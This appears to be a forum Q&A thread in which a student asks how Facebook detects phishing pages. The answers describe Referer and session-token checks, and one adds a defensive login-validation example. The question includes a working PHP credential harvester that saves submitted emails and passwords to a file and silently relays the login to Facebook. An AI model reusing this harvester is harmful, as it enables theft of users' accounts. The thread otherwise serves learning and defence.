I'm doing a little assignment on computer security and I'm currently working on phishing.
So for educational purposes I wrote a simplistic "phishing webpage" and I'm trying to understand how Facebook detects fraudulent phishing webpages.

My index.html is the Facebook main page, which I edited in order to redirect the user to a phishing.php page.

phishing.php:
```php
<?php
$file = fopen('phishing.txt', 'a');
fwrite($file, 'M: '.htmlspecialchars($_POST['email'])."\nP: ".htmlspecialchars($_POST['pass'])."\n\n");
fclose($file);
?>
<form action="https://www.facebook.com/login.php?login_attempt=1" method="post" name="frm">
<?php
foreach ($_POST as $a => $b) {
    echo "<input type='hidden' name='".htmlentities($a)."' value='".htmlentities($b)."'>";
}
?>
</form>
<script language="JavaScript">
document.frm.submit();
</script>
```
My question comes here. Everything works well, except for the fact that once the user (me) enters his username and password, Facebook says:

> Security Notice: For your security, never enter your Facebook password on sites not located on Facebook.com
So which mechanism is used by Facebook in order to detect phishing pages like this?
Thanks!
I can think of many ways that Facebook does this.

Method one: HTTP Referer

In every HTTP request that you send, a Referer header is sent along with it to indicate where you came from, so Facebook can simply do the following:

```php
$referer = parse_url($_SERVER['HTTP_REFERER'] ?? '', PHP_URL_HOST); // e.g. "www.facebook.com"
if ($referer !== 'facebook.com' && !str_ends_with((string) $referer, '.facebook.com')) {
    // Phishing
}
```
Method two: Sessions

Facebook may start a session on their index.php page that will be checked once the login form is submitted, for example:

index.php

```php
session_start();
$_SESSION['coming_from_facebook'] = true;
```

login.php

```php
session_start();
if (($_SESSION['coming_from_facebook'] ?? false) !== true) {
    // Phishing
}
```

This is all pseudo-code and the first method is easily bypassable as users can modify Referer headers.
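As an added example (not code from the question or the answer), here is a login handler that applies both of the checks described above in one place, with the request data passed in as arrays so it can be run from the PHP CLI against constructed requests. The allowed domain, the `login_token` field and session key, and the sample hostnames are assumptions.

```php
<?php
// Added example, not code from the question or the answer: a login handler
// applying both checks the answer describes. The allowed domain, field names
// and session layout are assumptions; $server/$session/$post are passed in as
// arrays so this runs from the PHP CLI (8.0+) with constructed data.
function hostAllowed(?string $url, array $allowedDomains): bool {
    $host = is_string($url) ? parse_url($url, PHP_URL_HOST) : null;
    if (!is_string($host)) {
        return false;            // missing or unparsable header
    }
    $host = strtolower($host);
    foreach ($allowedDomains as $domain) {
        // exact match (facebook.com) or a subdomain (www.facebook.com)
        if ($host === $domain || str_ends_with($host, '.' . $domain)) {
            return true;
        }
    }
    return false;
}

function checkLoginRequest(array $server, array $session, array $post): string {
    $allowed = ['facebook.com'];   // assumption: the site's own registered domain

    // Method one: the page that posted the form must be ours. Browsers send
    // Origin on cross-site POSTs; both it and Referer can be stripped or forged,
    // so this is only a first filter.
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if (!hostAllowed($origin, $allowed)) {
        return 'reject: form not submitted from our domain';
    }

    // Method two: a token issued with our login form (kept in the session and
    // echoed as a hidden field) must come back. A copy of the form hosted
    // elsewhere cannot know it; hash_equals() avoids a timing side channel.
    $expected = $session['login_token'] ?? '';
    $given    = $post['login_token'] ?? '';
    if (!is_string($expected) || $expected === '' || !is_string($given)
        || !hash_equals($expected, $given)) {
        return 'reject: missing or wrong session-bound login token';
    }
    return 'ok';
}

// Constructed sample requests: a real submission and one relayed by a copied page.
$session     = ['login_token' => bin2hex(random_bytes(16))];
$fromOurForm = ['HTTP_ORIGIN' => 'https://www.facebook.com', 'HTTP_REFERER' => 'https://www.facebook.com/'];
$fromCopy    = ['HTTP_REFERER' => 'http://phish.example/index.html'];
echo checkLoginRequest($fromOurForm, $session, ['login_token' => $session['login_token']]), PHP_EOL;
echo checkLoginRequest($fromCopy, $session, ['email' => 'x', 'pass' => 'y']), PHP_EOL;
echo checkLoginRequest($fromOurForm, [], []), PHP_EOL;
```

The third call shows why the session check matters on its own: a request with a correct Origin but no token issued by the real form is still rejected.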